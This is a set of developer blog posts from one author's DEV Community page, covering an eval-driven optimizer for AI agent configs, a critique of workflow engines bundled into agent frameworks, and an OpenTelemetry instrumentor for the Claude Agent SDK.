DEV Community: Jeremiah Justin Barias

Your Eval Suite Is Already a Loss Function

Jeremiah Justin Barias — Sat, 06 Jun 2026 00:00:00 +0000

The loop everyone runs by hand
The eval suite was a loss function the whole time
Two problems: no gradient, and mixed axes
Coordinate descent, with an LLM for the text
How it fits into holodeck
Acceptance, and the part I haven't solved yet
What you get out the other end
Where this goes next

A couple of days ago I gave a talk at AI Engineer Melbourne called "Stop vibing your agents to production: applying ML discipline to agent development." The whole argument was that we already know how to do this. It's just ML engineering, wearing a different hat. Version your artifacts. Treat your evaluators as loss functions. Search your hyperparameters instead of guessing at them. Near the end I said, more or less out loud, that I was building an optimizer into HoloDeck to close the loop on that last part. This post is that optimizer.

So let me start where the talk started, with the loop everyone runs by hand. If you've shipped an agent, you've run it. You change the temperature, or you reword a paragraph of the system prompt, you re-run your evaluations, you look at the numbers, and you decide whether that was better or worse. Then you do it again. And again. You stop when the scores look decent or when you run out of patience, whichever comes first.

I've done this enough times that I started to resent it. Not because it doesn't work, but because of how it works. It's slow, it's driven by vibes, and the gains don't stack. The point of the talk, and of this post, is that the loop is something with a name, and once you name it you can hand it to a machine. Below is the realisation, and what I built into HoloDeck once I had it.

The loop everyone runs by hand

The loop, drawn out: pick a change, re-run the suite, eyeball the result, go around again.

Three things are wrong with it.

It's tedious. Every pass is a full eval run, real model calls, real metric work, and you're babysitting a terminal while it grinds. Annoying, but you can live with it.

Worse: you're flying blind. You tighten the prompt, conciseness ticks up, you move on. A day later you notice groundedness dropped two points back when you made that edit, and you never caught it because you were watching the number you were trying to move, not the one you broke. I can't track six metrics by eye across a dozen edits. Neither can you.

And the edits don't stack. Every one is judged on its own, against whatever the agent looked like a moment ago, and there's no record of the path you took. You can't tell whether you're climbing or wandering. You stop because you're tired, not because you got somewhere.

The eval suite was a loss function the whole time

This is the thing I'd been walking past. The reason you can run this loop at all is that you already have an evaluation suite. Some metrics (groundedness, conciseness, a custom G-Eval criterion, whatever), each one scoring the agent's answers on your test cases, each one producing a number.

Collapse those numbers into one. Weight the metrics by how much you care, take a weighted mean, and define:

loss = 1 − weighted_mean

Perfect agent scores 1.0 everywhere, so loss is 0.0. Worse agent, higher loss. That's a loss function: the scalar an optimizer minimizes. I'd been computing it by hand and eyeballing it every run; I just never called it that.

And once "better" is a number that goes down, the manual loop stops being a craft and starts being a search. "Change something, re-run, keep it if the number dropped" is not vibes anymore. It's the inner loop of an optimizer, run by a human who doesn't know that's what they're doing.

So why am I in this loop? I had the loss function and a way to score it. I just wasn't optimizing against it; I was the optimizer, running by hand, one slow trial at a time.

Two problems: no gradient, and mixed axes

If this were a normal optimization problem, you'd reach for gradient descent and be done. It isn't, for two reasons, and both reasons shape everything that follows.

There's no gradient. The loss comes out the far end of a pile of LLM calls and metric judges. You can't differentiate it. Nudge the temperature by 0.01 and you have no analytic handle on which way the loss moved; you can only run the whole suite again and find out. This is the world of derivative-free optimization, and it's well-trodden: when you can't compute a gradient, you sample.

The axes aren't the same kind of thing. Some of what you tune is numeric and continuous: model.temperature, a retriever's top_k, a min_score threshold. You can put those on a number line. But the single biggest lever on an agent's behaviour is the instruction text, and text doesn't live on a number line. "Rewrite this paragraph to be firmer about citing sources" is not a step in any direction you can express as a float.

So you've got a non-differentiable objective over a search space that's part numbers, part prose. That combination is exactly what makes this awkward, and it's also what points straight at the technique that fits.

Coordinate descent, with an LLM for the text

When you can't move all your variables at once, you move them a group at a time. Freeze most of the axes, optimize the rest, then switch which ones are frozen. That's coordinate descent , and it's the oldest trick in the derivative-free book. It's a clean fit here, because the two kinds of axis want completely different machinery.

For the numbers, freeze the text and run a real numeric optimizer over the knobs. I use Optuna's TPE sampler: it models which regions of the parameter space tend to produce low loss and samples the promising ones, instead of blindly gridding. That's the numeric phase.

For the text, freeze the numbers and do the thing you can't do with a number line, but borrow the shape of gradient descent anyway. In real gradient descent the gradient tells you which direction reduces the loss. Here, a Critic model plays that role: it looks at the cases the agent is currently failing and writes, in plain language, what's wrong and which way to push, a natural-language "gradient." Then an Applier model takes that critique and rewrites the instructions accordingly. Score the rewrite. If it's better, keep it and critique again from there; if not, the chain doesn't advance. That's the textual phase : iterative refinement, each step building on the failing cases the last one left behind.

I didn't invent this part. It's the TextGrad framing (Yuksekgonul et al., 2024): treat the natural-language critique as a "gradient" and the rewrite as a step in its direction, iterating in place the way real gradient descent updates a variable. The same lineage runs through OPRO, ProTeGi, and DSPy. Splitting it into two separate calls, one that describes the gradient and one that applies it, is what keeps the whole thing legible: you can read exactly why each rewrite happened, and you could ablate either half. The textual phase is that loop, gated so only a rewrite that actually lowers the loss advances the best agent.

One numeric phase followed by one textual phase is a cycle. And the reason you cycle, rather than tuning numbers once and text once and calling it done, is that they interact. The best temperature for one set of instructions isn't the best temperature for the rewritten ones. So you go around again: re-tune the numbers now that the text has moved, then re-tune the text now that the numbers have moved. Each kind of change compounds on the other's gains.

The compounding is the whole point, and it's what the manual loop can't give you. There's a single baseline , the best candidate found so far, and it only ever moves forward. A trial is accepted only if it beats that baseline. The baseline never moves backward, so every accepted change is measured against the best version of everything that came before it, not against whatever you happened to be looking at a minute ago.

How it fits into holodeck

This is holodeck test optimize. If you already have an agent.yaml with an evaluations block, you add one more section, evaluations.optimizer, declaring the loss weights and which axes the optimizer is allowed to touch.

evaluations:
  metrics:
    - type: standard
      metric: groundedness
    - type: geval
      name: Conciseness
      criteria: "The response is concise and avoids redundancy."
  optimizer:
    loss: # metric weights; loss = 1 - weighted_mean
      groundedness: 2.0
      Conciseness: 1.0
    axes:
      numeric: # query-time hyperparameters (Optuna TPE)
        - path: model.temperature
          type: float
          range: [0.0, 1.0]
        - path: tools[name=knowledge_base].top_k
          type: int
          range: [3, 12]
      textual: # instruction text rewritten by Critic/Applier
        - path: instructions.inline
          max_chars: 6000
    max_cycles: 3
    numeric_phase: { max_trials: 12, patience: 5 } # patience: give up after 5 non-improving trials
    textual_phase: { max_trials: 5, patience: 3 }
    min_delta: 0.01 # minimum loss reduction required to accept
    seed: 42

Then you run it:

holodeck test optimize agent.yaml

It streams the loss of every trial as it goes, and prints a baseline → best summary at the end.

The vocabulary is worth pinning down, because the whole thing nests neatly and the words mean specific things. Smallest to largest:

Term	What it is
Trial	The atomic unit. One candidate config, scored once = one full eval pass over your test set = one `loss` number. Every row in `trials.jsonl` is a trial.
Phase	A sweep over one kind of axis. The numeric phase tunes the numbers via Optuna; the textual phase rewrites instructions. Each phase runs many trials.
Cycle	One numeric phase followed by one textual phase: freeze the text and tune the numbers, then freeze the numbers and tune the text.
Baseline	The best candidate so far. The bar every trial must beat (by `min_delta`) to be accepted. Starts as the unchanged agent, scored once.

Drawn as a tree, the run nests run → cycle → phase → trial, with each trial bottoming out in one real evaluation pass:

The budgets matter because of that bottom row. Every trial is a real evaluation run, so the number of trials is the main driver of how long the optimization takes and how many tokens it burns. Three knobs bound it. max_cycles caps the outer loop. Each phase's max_trials is a ceiling on its trials, not a quota it has to fill. And patience is the early-stopping rule borrowed straight from training loops: count the trials in a row that fail to beat the current best, and once that count hits the patience value, the phase gives up and moves on. A patience: 5 numeric phase quits after five consecutive misses, even if it had budget for more. So the example above is up to 3 × (12 + 5) = 51 trials plus the baseline, and in practice usually far fewer, because phases stop the moment they stall instead of grinding through their whole ceiling.

One detail I care about: your original agent.yaml is never touched. The optimizer overlays its candidate changes on an in-memory copy. The best candidate gets written to a separate best.yaml, with secrets kept templated as ${VAR}. The file is rebuilt from the un-substituted source, so it never leaks a resolved credential. You review the result and copy it over yourself, if you want it.

Acceptance, and the part I haven't solved yet

The accept rule is deliberately strict. A candidate's loss has to undercut the current best by more than min_delta. Ties don't count. A change that's 0.001 better than the baseline when min_delta is 0.01 is treated as noise and rejected. This is what keeps the baseline meaningful: it only advances on changes big enough to believe in.

A couple of smaller decisions fall out of taking the loss seriously. Metric runs that error are excluded from the mean rather than scored as zero, because an exception talking to a judge model shouldn't masquerade as "the agent gave a terrible answer." But a legitimate 0.0 score is kept, because that one is the agent being bad.

One caveat, and it's a real one. This is an MVP. Acceptance is just the raw loss delta: no holdout split, no repeated trials, no variance bar. So on a noisy suite, a small min_delta chases the noise: the optimizer "finds" a win that's really two test cases flipping by luck, accepts it, and builds everything after on top of a number that meant nothing. Set min_delta high enough that a single case flipping can't clear it.

That's a patch, not a fix. The fix is variance-aware acceptance: holdout splits, repeated scoring, a real significance bar. It's the v1 follow-up, and the single biggest thing between this and something you'd trust unattended.

A second rough edge: today the run only persists its full state at the end. Each trial is live, billable, and minutes long, so a process that dies mid-run throws away work you've already paid for. That one's already designed (below) and mostly a matter of building it.

What you get out the other end

Every run writes a results/optimizer/<run-id>/ directory:

best.yaml : the best candidate, ready to copy over your original. Secrets stay templated.
trials.jsonl : one record per trial. The full audit trail: every config tried, its loss, whether it was accepted. This is the thing the manual loop never gave you, a record of the actual path, not just the endpoint.
report.md : baseline versus best, the edits that were accepted, and a per-phase summary.

And because every trial is a real holodeck test run under the hood, it inherits the same observability wiring. If your agent has an observability block pointed at an OTLP collector, the optimize run exports a span tree (root, baseline, cycle, phase, trial) with each trial's evaluation spans nesting underneath, plus metrics for trial loss, best loss after each accepted improvement, and the overall baseline-to-best improvement. You can literally watch the loss come down in Grafana or Aspire, trial by trial. When observability is off, none of that fires and the optimizer behaves exactly as before, same as the rest of HoloDeck.

The trial spans carry only primitives, by the way: numeric params as a JSON string, the textual axis name, and a short human-readable edit summary. Never the instruction text and never a resolved secret. The same restraint as best.yaml, for the same reason.

Where this goes next

The MVP stops at "find candidate improvements against quality." Three things take it further, and none of them require tearing up what's already there.

Variance-aware acceptance is first, for the reason above. Right now the accept rule trusts a single noisy number. The fix is the standard ML hygiene the talk was about in the first place: score on repeated runs, hold out a slice of cases the optimizer never tunes against, and put a real significance bar in front of the accept instead of a raw delta. That turns "this candidate looks 0.02 better" into "this candidate is better, and here's the confidence," which is what you'd want before letting it run overnight.

Checkpointing and resume falls out of a decision already made: the audit log is the checkpoint. Each completed trial already appends a row to trials.jsonl. Make that write atomic and per-trial, give the run a deterministic id from a fingerprint of the agent, the config, and the seed, and resuming is just replaying the log: rebuild the running best from the accepted rows, re-hydrate each numeric phase's Optuna study from its own trials so the sampler isn't reset, and carry on from the last complete row. No separate pickle, no second source of truth. Kill the run, resume it, don't re-pay for a single trial you already finished. The contract's written; it's mostly build.

Cost and latency budgets change what "best" means, and the obvious move here is the wrong one. Folding cost into the loss with some weight breaks the [0, 1] loss and the single advancing baseline the whole compounding loop is built on. So cost and latency don't go in the loss. They go in the accept rule, as a hard budget gate: a candidate has to beat the best loss by min_delta and come in under your declared cost and latency ceilings. Quality stays the only thing minimized; the budget just decides which improvements are allowed to count. Cost is priced tokens against a model price table. For local models, where tokens are free, the latency ceiling carries the economic signal instead, which is the case you actually care about. The accept rule gains one conjunct; nothing else moves.

Further out, the gap against the rest of the field is few-shot demonstration optimization, the lever DSPy leans on hardest. That one needs real surface area: a first-class slot for demonstrations on the agent schema, and a third proposer to select them. It's a v2 headline, not a quiet patch.

The core needed almost no new machinery. The loss function already existed; it was your eval suite, read sideways. Coordinate descent is decades old. Optuna does the numeric search. The one genuinely new piece is using an LLM as a stand-in for the gradient on the text axis, and even that is just "look at what's failing, say what to change," which is what you were doing by hand. The optimizer isn't doing anything you couldn't do. It's doing what you were already doing, except it doesn't get tired, it doesn't miss that groundedness dropped while you were fixing conciseness, and it keeps a receipt for every step.

The caveat stands: until variance-aware acceptance lands, this finds candidate improvements, and min_delta is what stops it from fooling itself on a noisy suite. But even now, it beats sitting in the loop by hand. Run it on your own suite overnight and see what it turns up. Worst case you've spent some tokens; best case you wake up to a best.yaml that beats anything you'd have found by hand.

References

Barias, Justin. "Stop vibing your agents to production: applying ML discipline to agent development." AI Engineer Melbourne, 4 June 2026.
HoloDeck. "Optimizing Agents (holodeck test optimize)." HoloDeck documentation.
Yuksekgonul, M., Bianchi, F., Boen, J., Liu, S., Huang, Z., Guestrin, C., and Zou, J. "TextGrad: Automatic 'Differentiation' via Text." arXiv:2406.07496, 2024.
Yang, C., Wang, X., Lu, Y., Liu, H., Le, Q.V., Zhou, D., and Chen, X. "Large Language Models as Optimizers (OPRO)." arXiv:2309.03409, 2023.
Pryzant, R., Iter, D., Li, J., Lee, Y.T., Zhu, C., and Zeng, M. "Automatic Prompt Optimization with 'Gradient Descent' and Beam Search (ProTeGi)." arXiv:2305.03495, 2023.
Khattab, O., Singhvi, A., Maheshwari, P., Zhang, Z., Santhanam, K., et al. "DSPy: Compiling Declarative Language Model Calls into Self-Improving Pipelines." arXiv:2310.03714, 2024.
Akiba, T., Sano, S., Yanase, T., Ohta, T., and Koyama, M. "Optuna: A Next-generation Hyperparameter Optimization Framework." Proceedings of the 25th ACM SIGKDD International Conference on Knowledge Discovery & Data Mining, 2019.
Wright, S.J. "Coordinate descent algorithms." Mathematical Programming, 151(1), 2015.

Agent Workflows: A Solved Problem, Reinvented

Jeremiah Justin Barias — Thu, 30 Apr 2026 00:00:00 +0000

Microsoft Agent Framework hit 1.0 a few weeks ago. Like Google ADK, LangGraph, and CrewAI before it, it ships two things bundled together: an agent runtime, and a workflow engine. The agent part is fine. The workflow engine is the bit that made me stop and squint.

Workflows are a solved problem in software. We've had finite state machines for decades, distributed sagas over message buses since the 2000s, and durable execution engines since Microsoft Orleans, Azure Durable Functions, and Temporal showed up. And yet here we are in 2026, with every major agent framework shipping its own workflow runtime alongside the agent code.

Let me try to map out why I think this matters.

What graph dataflow actually is

Crack open the source for Microsoft Agent Framework's Workflows package, or look at LangGraph's Pregel module, and you'll find the same thing: a graph engine running on the BSP (Bulk Synchronous Parallel) model, originally formalised by Google's Pregel paper for large-scale graph processing.

Every executor with a pending message runs concurrently in a superstep. When all of them finish, outgoing messages get delivered along the edges, and the next superstep kicks off. Repeat until nothing is left to process.

If you've worked with Apache Beam, Akka Streams, or Flink, this should feel familiar. It's the same design that powers stream processing systems. Pregel and its descendants exist because, when you have lots of small computations that need to coordinate via typed messages with checkpointing between rounds, BSP gives you a clean execution model with built-in fan-out, fan-in, and synchronisation barriers.

Where this earns its keep is real but narrow:

Streaming pipelines with backpressure (token-by-token output through a chain of transformers).
Declarative authoring tools where non-engineers drag nodes around in a UI (n8n, Zapier are basically this).
Fan-out-heavy work with typed joins (send the same query to ten agents, aggregate the results).

For the typical agent application, you don't need any of that.

Graph dataflow assumes a topology like this, with fan-out, joins, and supersteps:

Most agent apps actually look like this. An agent loop with tool calls, plus the occasional handoff:

A handoff is just one agent calling a tool that transfers control to another agent. That's a function call inside a while loop. You don't need supersteps for it.

Where the frontier labs sit

Unsurprisingly, Anthropic and OpenAI, the two model labs whose products everyone is integrating with, have very deliberately not shipped workflow engines.

	Anthropic / OpenAI	Microsoft / Google / LangChain
Workflow engine	Don't ship one	Ship one bundled with the agent runtime
Composition	Bring your own (Temporal, FSM, bus, code)	Use ours (graph DSL, declarative YAML)
Examples	Claude Agent SDK, OpenAI Agents SDK	MAF Workflows, Google ADK, LangGraph, CrewAI
Bet	Models need less scaffolding over time	Enterprises need built-in compliance + audit

Anthropic's "Building Effective Agents" essay from late 2024 is unusually pointed. They draw a line between workflows (predefined code paths) and agents (systems that direct their own behaviour), then explicitly warn against reaching for frameworks. The argument is that frameworks add layers of abstraction that obscure the underlying prompts and responses, and make it tempting to add complexity when a simpler setup would do. They name LangGraph, Bedrock Agents, Rivet, and Vellum specifically.

The Claude Agent SDK reflects this. It's primitives: an agent loop, tool calling, memory hooks, MCP integration. No workflow graph. No node-and-edge DSL. If you want multi-step logic, you write code.

OpenAI's Agents SDK is the same shape. Four primitives: agents, handoffs, guardrails, and sessions. Handoffs aren't a graph topology. They're literally function tools the LLM calls (transfer_to_refund_agent). Multi-agent orchestration is just one agent invoking a tool that hands control to another. When users need durability, the recommended pattern is to wrap the SDK inside Temporal: each agent invocation becomes a Temporal activity, and the workflow engine handles persistence and recovery.

So the model labs themselves are saying: ship great primitives, and let people compose them with the orchestration tools they already have.

The actual spectrum of orchestration

"Workflow" gets used as a single word for at least four different problems. They are not interchangeable.

Category	What it solves	Example libraries (.NET-leaning)	Production-grade since
In-process FSM	Valid state transitions, single process	Stateless, Automatonymous	~2010
Distributed saga	Cross-service coordination + compensations	MassTransit, NServiceBus, Brighter	~2009
Durable execution	Replay-based recovery through crashes	Temporal, DurableTask, DBOS, Restate	~2017
Graph dataflow	Typed parallel message-passing + streaming	LangGraph, MAF Workflows, Beam	~2024 (for agents)

The category that doesn't get enough airtime in agent-framework discussions, and is honestly the most important one, is durable execution. It gives you something neither an FSM nor a bus can: deterministic replay.

   Run 1 (crashes after step 3):              Run 2 (replay):
   -----------------------------              ---------------

   step 1 --> [LLM call: $0.50]   logged      step 1 --> [logged]     skip
   step 2 --> [tool call]         logged      step 2 --> [logged]     skip
   step 3 --> [LLM call: $5.00]   logged      step 3 --> [logged]     skip
   step 4 --> [tool call]         CRASH       step 4 --> [tool call]  runs
                                              step 5 --> continues normally

The way it works: your code runs, and the engine logs every external call as an event. If your process dies halfway through, it doesn't restart from a saved saga state. It replays your code from the top, skipping calls whose results are already in the log, until it catches up to the live state. From your perspective, you write straight-line async code. From the system's perspective, every step is recoverable.

For long-running agent work (an LLM call that takes thirty seconds, then a tool call that takes two minutes, then another LLM call), this is exactly the right primitive. You really don't want to redo a five-dollar LLM call because your container restarted.

The interesting thing is that Microsoft already ships DurableTask, and has done since 2017. The Agent Framework's Workflows package even has a DurableTask integration. Which raises a fair question: if I want durability, I can use DurableTask directly. If I want messaging, I can use MassTransit directly. If I want state validation, I can use Stateless directly. What does the graph runtime add that I couldn't get by composing what already exists?

The honest answer: streaming, and graph-topology authoring. For most agent applications, neither matters.

The cost of a new paradigm

There's a real cost to learning a new orchestration model, and framework marketing tends to undersell it.

Adopting a graph dataflow runtime	Composing existing primitives
Executor lifecycle	`async Task` (already known)
Edge types: direct, fan-in, fan-out, switch	Stateless config (afternoon to learn)
Superstep concurrency rules	MassTransit sagas (well-documented)
Port system + checkpointing	DurableTask (years of Azure Functions docs)
All framework-specific	Composes; transfers everywhere

The framework pitch is "we'll handle the orchestration concerns for you." The reality, often, is that you've added a layer of indirection between your code and the things actually running. Debugging a misbehaving agent flow now means understanding both the model's reasoning and the runtime's superstep scheduling. When something hangs: is it the LLM, or the edge router?

This is where Anthropic's framework critique lands hardest. They didn't say frameworks are wrong. They said frameworks obscure the prompts and responses. For agent work specifically, that obscurity is expensive. The single most useful debugging move is reading what the model was actually asked, and what it actually said. Anything that puts a layer between you and that loop costs you when things go sideways.

There is a fair counterargument. Declarative graph workflows make compliance, audit, and visualisation easier. If you're an enterprise selling to regulated industries, "here is the YAML that defines exactly what the agent does" is genuinely valuable, and that's clearly the bet Microsoft and Google are making. I'm not saying that bet is wrong. It's just a different bet from "ship great primitives and trust developers to compose them," which is what the model labs themselves are doing.

What models can do for themselves now

The other reason I'm sceptical of heavy workflow engines for agents is that the models are getting better at running their own long-horizon work without external orchestration scaffolding.

Anthropic's recent posts on context engineering describe Claude Code's pattern: a long-running agent that uses primitives like glob and grep to navigate its environment just-in-time, with CLAUDE.md files providing high-level instructions and the filesystem itself as scratch memory. It's not a graph. It's not a state machine. It's a model with good tools and a workspace.

The pattern that's emerging, and I think this is the actually interesting trend, is using the filesystem as ephemeral memory for long-running tasks. The agent reads, writes, and updates files as it works. If it crashes, you can resume by handing it back the same workspace and asking it to continue. The "state" of the workflow is the state of the files, which is exactly the abstraction every developer already understands.

This is roughly how Claude Code, Cursor, and similar coding agents work today. The orchestration is light because the model is doing the orchestration. The framework's job is to give the model good tools, a sandbox to run them in, and a way to recover when something fails. The job is not to model the agent's reasoning as a graph.

If models keep improving at long-horizon coherence (and the trajectory over the last eighteen months says they will), then the heavy orchestration frameworks built for 2024-era agent capabilities will start to feel like overkill, the same way XML-based BPM engines feel like overkill for most modern web apps.

We've forgotten about bounded contexts

Step back from the framework debate and look at what people are actually building.

The most common multi-agent architecture in practice (the one Claude Agent SDK encourages, the one Anthropic's research agent uses, the one most production deployments converge on) is orchestrator + subagents:

The orchestrator decides what work needs doing, spawns subagents to do it, possibly spawns more, and aggregates the results. This is fine for a single coherent task. Where it goes wrong is when teams scale this pattern across multiple business domains, and end up with one orchestrator whose subagents can touch the entire system: orders, inventory, payments, shipping, customer comms, the lot.

That's a monolithic agentic system. We're building 2010-era enterprise monoliths and calling them agents.

The architecture: agents per bounded context, talking via messages.

Domain-driven design solved this fifteen years ago. A bounded context owns its model, its language, its rules, its data. If something inside one context needs to cause an effect in another, you don't reach across. You send a message. The receiving context decides how to interpret it. This is the basic shape of every microservices architecture that actually scales.

Agents should follow the same rule. An ordering agent operates on orders. It does not directly modify inventory, charge cards, or trigger shipments. When an order needs to reserve stock, it publishes OrderPlaced (or sends ReserveInventory), and the inventory context's agent picks it up and does the work inside its own boundary.

This isn't just architectural hygiene. Bounded contexts give you everything you'd want from a serious agent system:

Blast radius. A misbehaving inventory agent can corrupt inventory. It can't burn down ordering and shipping with it.
Authority boundaries. Each agent has tools and permissions only for its own context. Least-privilege becomes enforceable instead of aspirational.
Independent evolution. Teams can change the inventory agent's prompts, model, or tools without coordinating with five other domains.
Auditability. "What did the agent do?" has a finite answer per BC, not a distributed trace through one mega-orchestrator's reasoning.

And critically, this is how you get back to mature orchestration tooling. Cross-BC messages are exactly what message buses are for. MassTransit, NServiceBus, Kafka, RabbitMQ, all designed for this. If your agent architecture is bounded contexts communicating via events, you don't need a graph workflow engine to coordinate them. You need a bus.

The bundled-workflow-engine approach actively works against this. It encourages you to put all your agents in one workflow graph, in one process, sharing one execution context. That's the topology of a monolith. Labelling the boxes "agent" instead of "service" doesn't change it.

If you're building anything beyond a toy demo, the question isn't "what graph runtime should orchestrate my agents." It's "what are my bounded contexts, and which agents live in each one?"

So what should you reach for?

If you need...	Reach for
In-process state validation	Stateless (or equivalent FSM)
Cross-service coordination with compensations	MassTransit + Automatonymous, NServiceBus
Long-running tasks that survive process restarts	DurableTask or Temporal
Agent loops	Claude Agent SDK or OpenAI Agents SDK, composed with the above
Fan-out-heavy streaming pipelines	A graph runtime (LangGraph, MAF Workflows)
"Agent application" by default	SDK + filesystem + the right one of the above

The thing I want to push back on is the assumption that "agent application" implies "agent framework with bundled workflow engine." It doesn't. Most agent applications I've seen would be better served by an SDK plus one of the existing orchestration tools above, picked deliberately based on what the application actually needs.

Workflows are a solved problem. Let's not unsolve them in the name of progress.

References

Malewicz, G., Austern, M.H., Bik, A.J.C., Dehnert, J.C., Horn, I., Leiser, N., and Czajkowski, G. "Pregel: A System for Large-Scale Graph Processing." Proceedings of the 2010 ACM SIGMOD International Conference on Management of Data, 2010.
Anthropic. "Building Effective Agents." Anthropic Research, 19 December 2024.
Anthropic. "How we built our multi-agent research system." Anthropic Engineering, June 2025.
Anthropic. "Effective context engineering for AI agents." Anthropic Engineering, 2025.
Fowler, Martin. "BoundedContext." martinfowler.com, 2014. (Originating concept: Evans, Eric. Domain-Driven Design: Tackling Complexity in the Heart of Software. Addison-Wesley, 2003.)

I Built an OpenTelemetry Instrumentor for Claude Agent SDK

Jeremiah Justin Barias — Mon, 02 Mar 2026 00:00:00 +0000

Background
The problem
What I built
The hooks thing
Getting started
What the traces look like
Rough edges and what's next

Background

A while back I wrote about going all-in on Claude Agent SDK for Holodeck. The short version: I decoupled Holodeck from Semantic Kernel through an abstraction layer, then hooked up Claude Agent SDK as a first-class backend — bash, filesystem, MCP tools, sandboxing, all native.

That post was about running agents. This one is about seeing what they're doing once they run.

With Semantic Kernel, this was a solved problem — it has native OpenTelemetry integration, so you got traces and metrics for free just by wiring up a provider. When I moved to Claude Agent SDK, that didn't exist. So I had to build it myself.

The problem

I started running longer agent sessions — multi-turn research tasks, code generation workflows, that kind of thing. And pretty quickly I realized I had no idea what was happening inside them.

Like, basic stuff:

How many tokens did a 10-turn conversation actually use?
Which tool calls are taking forever?
Did the agent error out on turn 5 and just keep going?

I could grep through logs, sure. But I wanted real traces — the kind where you open Jaeger or Grafana and see a waterfall of what happened, with timing, with parent-child relationships between agent turns and tool calls.

OpenTelemetry already has GenAI semantic conventions for exactly this. Nobody had built an instrumentor for the Claude Agent SDK yet. So I did.

What I built

opentelemetry-instrumentation-claude-agent-sdk — it's a Python package that monkey-patches query() and ClaudeSDKClient at runtime. Standard OTel instrumentor pattern, nothing fancy.

After you call .instrument(), every agent invocation gets:

An invoke_agent span with model, token counts (input, output, cache hits), finish reason, conversation ID
execute_tool child spans for each tool call — Bash, Read, Write, MCP tools, whatever
Histograms for token usage and operation duration

It follows the GenAI semconv spec, so these traces look like any other LLM provider in your existing dashboards. That was important to me — I didn't want to invent custom attributes that only work with Claude.

It only depends on opentelemetry-api and wrapt at runtime (not the SDK), so if you don't configure a TracerProvider, it's literally zero overhead — the OTel no-op path handles it.

Here's what .instrument() actually does under the hood:

┌─────────────────────────────────────────┐
│ ClaudeAgentSdkInstrumentor.instrument() │
└─────────────────────────────────────────┘
                         │
                         ▼
  Monkey-patches 4 SDK methods via wrapt:

  ┌─────────────────────┐
  │ wrapt.wrap query() │
  │ -> _wrap_query │
  └─────────────────────┘

  ┌────────────────────────────────────────┐
  │ wrapt.wrap ClaudeSDKClient. __init__ () │
  │ -> _wrap_client_init │
  └────────────────────────────────────────┘

  ┌─────────────────────────────────────┐
  │ wrapt.wrap ClaudeSDKClient.query() │
  │ -> _wrap_client_query │
  └─────────────────────────────────────┘

  ┌────────────────────────────────────────────────┐
  │ wrapt.wrap ClaudeSDKClient.receive_response() │
  │ -> _wrap_client_receive_response │
  └────────────────────────────────────────────────┘

                         │
                         ▼
  At call time, wrappers do:

  ┌─────────────────────────────────┐ ┌──────────────────────────────────┐ ┌────────────────────────────────────────────────────┐
  │ _wrap_query (standalone path) │ │ _wrap_client_init │ │ _wrap_client_query + _wrap_client_receive_response │
  │ │ │ │ │ │
  │ 1. inject hooks into options │ │ 1. call original __init__ () │ │ 1. query(): create span, set context │
  │ 2. create invoke_agent span │ │ 2. inject hooks into options │ │ 2. receive_response(): async iterate │
  │ 3. set InvocationContext │ │ 3. store OTel config on instance │ │ - intercept AssistantMessage │
  │ 4. async iterate wrapped() │ │ │ │ - intercept ResultMessage │
  │ - intercept AssistantMessage │ │ │ │ 3. record metrics, end span │
  │ - intercept ResultMessage │ │ │ │ │
  │ 5. record metrics, end span │ │ │ │ │
  └─────────────────────────────────┘ └──────────────────────────────────┘ └────────────────────────────────────────────────────┘

  │
  ▼
  All paths inject hooks into options:

  ┌───────────────────────────────────────────┐
  │ Injected Hooks (via merge_hooks) │
  │ │
  │ PreToolUse -> open execute_tool span │
  │ PostToolUse -> close span (success) │
  │ PostToolUseFail-> close span (error) │
  │ SubagentStart -> (future: subagent span) │
  │ SubagentStop -> (future: close span) │
  └───────────────────────────────────────────┘

The hooks thing

This is the part I'm actually proud of.

The Claude Agent SDK has a hook system — PreToolUse, PostToolUse, PostToolUseFailure, etc. Most people probably ignore them. But they're perfect for instrumentation.

The naive approach would be to parse tool calls out of the response stream after they finish. That works, but you lose accurate timing, and you can't catch failures cleanly.

Instead, I register hook callbacks. When a tool starts, PreToolUse fires and I open a span. When it finishes, PostToolUse closes it. If it crashes, PostToolUseFailure closes it with an error. Simple.

PreToolUse("Bash", tool_use_id="xyz") -> span starts
  ... tool runs ...
PostToolUse("Bash", tool_use_id="xyz") -> span ends

The tool_use_id lets me correlate start and end events even when multiple tools run. And the hooks are merged after any hooks you've already set up, so the instrumentation stays out of your way.

You can also opt into capturing tool arguments and results with capture_content=True. It's off by default because you probably don't want prompt contents showing up in your trace backend.

Getting started

pip install opentelemetry-instrumentation-claude-agent-sdk[instruments]

Minimal setup:

from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import SimpleSpanProcessor, ConsoleSpanExporter
from opentelemetry.instrumentation.claude_agent_sdk import ClaudeAgentSdkInstrumentor

provider = TracerProvider()
provider.add_span_processor(SimpleSpanProcessor(ConsoleSpanExporter()))

ClaudeAgentSdkInstrumentor().instrument(tracer_provider=provider)

Or if you use opentelemetry-instrument for auto-instrumentation, it just picks it up — the instrumentor is registered as an entry point.

opentelemetry-instrument python my_agent_app.py

Two lines if you already have a global TracerProvider:

from opentelemetry.instrumentation.claude_agent_sdk import ClaudeAgentSdkInstrumentor
ClaudeAgentSdkInstrumentor().instrument()

What the traces look like

Here's roughly what a multi-turn session looks like in your trace viewer:

invoke_agent [3.2s, 1847 in / 423 out tokens]
├── execute_tool "Bash" [0.8s]
├── execute_tool "Read" [0.1s]
└── execute_tool "mcp__github" [1.4s, type=extension]

invoke_agent [1.1s, 2103 in / 187 out tokens]
└── execute_tool "Write" [0.05s]

Both invoke_agent spans share the same gen_ai.conversation.id, so you can track a whole session. MCP tools get tagged as type=extension, built-in ones as type=function — handy if you want to see how much time your agent spends in external tools vs native ones.

Here's the invoke_agent span in the Aspire dashboard — you can see token counts, model, finish reason, and conversation ID all as span attributes:

And drilling into an execute_tool child span, you get the tool name, type, and the MCP tool path:

Rough edges and what's next

This is alpha. It works, I'm using it, but there's stuff I haven't gotten to yet:

Subagent tracking — the hooks are wired for SubagentStart/SubagentStop but I haven't built the spans yet
Content capture on agent spans — right now capture_content only covers tool args/results, not the full prompt/response

It's MIT-licensed on GitHub. If you're running Claude agents and want to actually see what they're doing, try it out. If something's broken, file an issue.

Previously: "You Don't Need Any Other Agent Framework" — where I talked about decoupling Holodeck from Semantic Kernel and hooking up Claude Agent SDK as a first-class backend.

You Don't Need Any Other Agent Framework, You Only Need Claude Agents SDK

Jeremiah Justin Barias — Wed, 25 Feb 2026 00:00:00 +0000

